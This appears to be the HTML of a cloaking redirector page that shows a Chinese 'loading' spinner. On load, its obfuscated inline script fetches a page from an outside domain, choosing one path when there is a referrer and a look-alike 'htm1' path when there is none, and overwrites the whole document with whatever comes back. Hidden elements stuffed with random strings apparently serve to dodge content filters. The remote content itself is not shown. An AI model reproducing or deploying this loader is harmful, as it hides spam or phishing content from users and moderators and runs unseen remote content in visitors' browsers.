<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .b5H47hOW {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .b5H47hOW .Sf0RlUr9 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .b5H47hOW .content {
            line-height: 50px;
            text-align: center
        }

        .b5H47hOW .img {
            width: 100%
        }

        .b5H47hOW .bVu1y5k {
            text-align: center
        }

        .b5H47hOW .bVu1y5k span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .b5H47hOW .bVu1y5k span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .b5H47hOW .bVu1y5k span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .b5H47hOW .bVu1y5k span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .b5H47hOW .bVu1y5k span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .b5H47hOW .bVu1y5k span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .b5H47hOW .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function AdYHzz2A8(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var ZewSFeg = AdYHzz2A8('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ ZewSFeg +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ ZewSFeg +".html?a=share";
		}
		
        exJmEXm8LN=url+"#"+new Date().getTime();
        exJmEXm8LN && function() {
            $.get(exJmEXm8LN, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >RRe3wtF941PVFdeLxx8JGDjugtlR6eTAINGWuyvoVhIUkeYRIYv2LdGs5bVYonA7yaJD3K1ez5chOf4bYzVHXJTpTLcg</li>
<img  src='' style='display:none'>
<ul style='display:none' >y1IBqohWHKO1h5N1qrSuKCAO1esodbTmBaL63j3JAocfc</ul><div class="b5H47hOW">
    <div class="Sf0RlUr9">
        <div class="bVu1y5k">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>QnN7UccDnJNs64KSwdd4PDGB31Ievr8BZfbCU2zUbg4rf9Eo10KUL9gBlZWTCSipDzAjMNbUIMyVYyg1crwAfKm2ZYLkG</div>
<span style='display:none'>MbPdtluJ1j4LgfZZqbYvaIXsJHOEPUhyKx4k8zcql8KRySnoYdf9qwEh5s4xt51v5Ap2nz17s9p0DxyNX9</span>
<a  href='#' style='display:none'>rFUv8xoCizvBFvFDFhoRR43aP3qx588</a>
<div style='display:none'>QnN7UccDnJNs64KSwdd4PDGB31Ievr8BZfbCU2zUbg4rf9Eo10KUL9gBlZWTCSipDzAjMNbUIMyVYyg1crwAfKm2ZYLkG</div>
<a  href='#' style='display:none'>rFUv8xoCizvBFvFDFhoRR43aP3qx588</a>
<a  href='#' style='display:none'>rFUv8xoCizvBFvFDFhoRR43aP3qx588</a>
<a  href='#' style='display:none'>rFUv8xoCizvBFvFDFhoRR43aP3qx588</a></body>
</html>